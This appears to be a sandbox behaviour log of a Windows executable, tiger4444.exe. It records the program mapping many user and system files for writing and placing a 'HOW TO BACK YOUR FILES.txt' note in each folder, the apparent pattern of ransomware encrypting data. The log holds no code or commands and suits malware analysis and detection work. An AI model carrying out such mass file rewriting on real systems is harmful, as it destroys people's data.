Map C:\Windows10Upgrade\resources\ux\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_cs-cz.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_da-dk.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_el-gr.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_en-us.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_es-mx.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_hr-hr.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_ko-kr.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_lt-lt.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_nl-nl.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-br.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_ro-ro.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_ru-ru.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_sk-sk.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_sl-si.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_sr-latn-cs.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_sv-se.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_tr-tr.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_uk-ua.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-cn.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-hk.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\ux\EULA\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\resources\amd64\BiosBlocks.xml process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\amd64\hwcompat.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\amd64\hwexclude.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\amd64\nxquery.cat process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\amd64\nxquery.inf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Windows10Upgrade\resources\amd64\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\dll2\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Windows10Upgrade\dll1\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\Public\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\Public\Videos\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\Public\Pictures\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\Public\Music\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\Public\Libraries\RecordedTV.library-ms process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\Public\Libraries\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\Public\Downloads\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\Public\Documents\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\Public\Desktop\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\Public\AccountPictures\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Videos\2NnCc4KzPlFvi.swf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\5K6QHDJbfIWjYG262dir.avi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\ccn85Ai_.mp4 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\nZxJYVmIXHGhm.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\ofQy-RjpJsOl2h.avi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\s9NfPDdsE6nhezSDza.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Videos\XZJL mjrH9\b70zp1nV4_RX.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\XZJL mjrH9\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\9v2jkjY15yj.mp4 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Aksfbq.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\CokPtPcir1Km9h.swf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\FFQYJepVdSMrceUSp.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\JKXNIWeQxs8Bq.swf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\NfDZ9FmKUznX7QjqQB0.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\OKe9Vwu AXHg.avi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\Ox_K.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\PdDH9giHo14Og6\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\flFRhosiB.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\LRb2X8JvR7dXd5G2QS.avi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\MOuupnQy6t5YPt.avi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\xBzkCKlaqOVT0MjkjP6.mp4 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\J4la1r gmDnAcszsLl\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\82zMDESjlfgM7otH 3.avi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\JCuda3TbU9_aKKvhOer.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\qkjB9QUudeJrk jkCRq.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\rjtTtY.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\X xmY.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\B0M8WjsC5SrNW4C-0\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\K8H_yKdZxq7njjSb.mkv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\TaaSYvvFHS17rq.mp4 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\_Vz8dSb7ILROS.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\wyauoDThVWGo4KOPbrPe.flv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Videos\1GssRSL s5Lr83\ZcGza_BmC\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Searches\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Searches\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Saved Games\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
Map C:\Users\FD1HVy\Pictures\0P3NBwM7Yaa5LdwVnoJJ.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\3WV0Ls jiLUSjUUco.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\5_uNa_SA36f77jy3w2Gv.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\6iyFgn9SrZHQ KGFU.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\8IrExsVsSnK3.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\8ZHyFqvR363JEtV.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\C876_Q.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\ES -V29.bmp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\f5nrkb2LotgtwH.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\FCOwn.bmp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\FgcCERd5K.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\fJ6HL8oLrkhks9adl.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\gTPmnYJT.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\hsN3S _.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\Hsyb4EvKfZDCo8.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\i2jPXe_5_EmayX-juQ.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\iJsVEnd5y-jq2.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\iKlWqFav.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\JHLKfbZ_wnxI.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\jTcjMuk8-c84cV.bmp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\LkpzuM_D0mU.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\M6y8KiMnNaGEd1.bmp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\N0NZDmMYf0H.bmp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\nqh87aP.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\qnFyF6.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\QYkN2xzet.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\rL58t9UpNE.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\sg1EYYvYbFWAigsa.bmp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\Sghof7ewON_UNTJ3.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\SJe4.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\snTK_4Hws.bmp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\tbI35.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\ugR0riRG8ulCowNjMAqj.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\xAWhA3CWoiGQ4.bmp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\Xs85b.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\YJvAER.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\zkGa22a5xC9Cll9U.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\_gki25reI.bmp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_ALL_ACCESS True 1
Fn
